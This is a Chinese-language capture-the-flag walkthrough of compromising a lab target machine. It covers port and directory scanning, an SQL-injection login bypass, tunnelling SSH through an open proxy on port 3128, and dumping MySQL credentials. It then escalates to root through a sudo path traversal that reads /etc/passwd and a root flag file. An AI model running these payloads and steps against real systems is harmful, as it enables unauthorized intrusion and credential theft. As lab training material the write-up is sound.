靶机下载链接
信息收集
arp=scan -l
nmap -sS 192.168.0.161
目录扫描
dirb http://192.168.0.161
网络探测
- 出现登录框 -> 尝试万能密码登录 -> 出现报错,大几率存在SQL注入漏洞
# 账号
1111111' || 1=1#
# 密码
1' || 1=1 #
提供给我们一个账号,使用shh登录
john:hereisjohn尝试登录SSH(22)端口
一直尝试连接不进去,
- 22端口无法使用,3128端口是一个代理端口,尝试利用3128端口进行代理访问22端口 -> 打开proxychains的配置文件进行配置代理
http 192.168.0.161 3128
测试发现无法直接连接22端口,可能需要代理跳转,现在我们设置一下代理
proxytunnel -a 6666 -p 192.168.0.161:3128 -d 192.168.0.161:22
-a 指定本地侦听端口
-p 使用代理IP和端口
-d 指定访问的目标和端口
发现ssh的22端口打开了,
继续挂代理,尝试对我们获取到的账号密码进行登录
ssh [email protected] -p 6666
通过执行/bin/bash,获得交换界面
ssh [email protected] -p 6666 /bin/bash
看一下.bashrc文件,是不是在这里配置了john不能登陆
bash 在每次启动时都会加载 .bashrc 文件的内容。每个用户的 home 目录都有这个 shell 脚本。它用来存储并加载你的终端配置和环境变量。
cat .bashrc
删除.bashrc文件中最后一行exit函数
sed -i '$d' .bashrc
登陆主机
ssh [email protected] -p 6666 hereisjohn
提权
检查了一下靶机,看一看内核可不可以提权
提权失败,目前能想到的思路就是看看数据库能不能登陆 进入/var/www
cd /var/www/
ls
cat login.php
登录数据库,查看SKYTech库下,查询login表,获得web界面的登陆账号密码【root:root】
mysql -u root -p
查看库
show databases;
use SkyTech
show tables;
select * from login;
- 新起一个窗口,将账号密码都进行保存,
vim user.txt #保存账号
vim password.txt #保存密码
对ssh端口进行批量爆破 -> 尝试登录sara用户
proxytunnel -a 6666 -p 192.168.0.161:3128 -d 192.168.0.161:22
ssh [email protected] -p 6666
ssh [email protected] -p 6666 /bin/bash
- 查看下该用户的权限 -> 普通用户
whoami
id
sudo -l
sara用户带有(root)权限的使用,尝试用这个进行提权
sudo /bin/cat /accounts/ ../../etc/passwd
我们可以用该方法去查看下root目录有什么文件,只需要将”cat“替换为”ls“
sudo /bin/ls /accounts/ ../../root
有个flag文件,我们进行查看 -> 存在root密码
sudo /bin/cat /accounts/ ../../root/flag.txt
root/ theskytower切换root用户登录 -> 提权成功
su root